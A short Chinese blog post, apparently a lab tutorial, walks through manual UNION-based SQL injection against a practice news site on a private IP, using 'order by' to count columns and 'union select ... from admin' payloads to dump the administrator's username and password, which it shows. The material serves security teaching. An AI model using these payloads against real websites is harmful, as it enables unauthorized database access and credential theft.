美文网首页
SQL注入原理-手工联合查询注入技术

SQL注入原理-手工联合查询注入技术

作者: 糖no1 | 来源:发表于2018-11-14 10:52 被阅读0次

【实验原理】首先,在链接后面添加语句

【order by 11(数字任意)】,

根据页面返回结果,来判断站点中的字段数目。然后,在链接后面添加语句

【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】,

进行联合查询,来暴露可查询的字段编号。

最后,根据上一步得到的字段编号,添加语句

【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,

直接暴露管理员用户名和密码。



就以新闻雷池作为例子


随便点击一个链接【http://192.168.1.3:8008/onews.asp?id=45】,在后面添加语句【order by 11】,页面显示正常。

同样添加语句【order by 12】页面报错,所以此站字段长度为11

在连接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字2和3

在连接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,即可暴出管理员用户名和密码。

管理员用户名【admin】和密码【bfpms】

相关文章

  • SQL注入原理-手工联合查询注入技术

    【实验原理】首先,在链接后面添加语句 【order by 11(数字任意)】, 根据页面返回结果,来判断站点中的字...

  • 一步一步学习 Web 安全 2.2 SQL 注入步骤

    上节了解了 SQL 注入的原理,但是我们进行 SQL 注入的时候肯定不是输入查询语句就能得到数据这么简单。 注入步...

  • 一步一步学习 Web 安全 2.4 union 联合查询注入

    对 SQL 注入有一个大致的了解后,我们再来深入学习。 SQL 注入有联合查询注入、报错注入、布尔盲注、时间盲注等...

  • 2019-11-13

    mysql手工注入 一、SQL注入的理解 将特殊SQL语句添加到查询url后面,以获取非法的数据的操作。 ...

  • Web安全之SQL注入漏洞[1]

    Web安全之SQL注入漏洞 本节知识点 SQL注入原理 前言 结构化查询语句(Structured Query L...

  • Less1

    基于报错的sql注入 字符型注入 数字型 括号型推测sql语句 **union ** 联合查询的方法,主要利用my...

  • SQL注入

    1、SQL注入的原理 应用程序在向后台数据库传递SQL查询时,如果为攻击者提供了该查询的能力,就会引发SQL注入。...

  • SQL注入记录

    sql 注入 1.盲注 (没有回显)2.显错注入3.报错注入 显错注入-联合查询(Mysql数据库)的基本流程 显...

  • union联合查询注入&&报错注入

    union联合查询注入 报错注入

  • (一)web框架

    web框架 sql注入原理 只要带入到数据库中查询的地方就有可能有注入

网友评论

      本文标题:SQL注入原理-手工联合查询注入技术

      本文链接:https://www.haomeiwen.com/subject/lkpdfqtx.html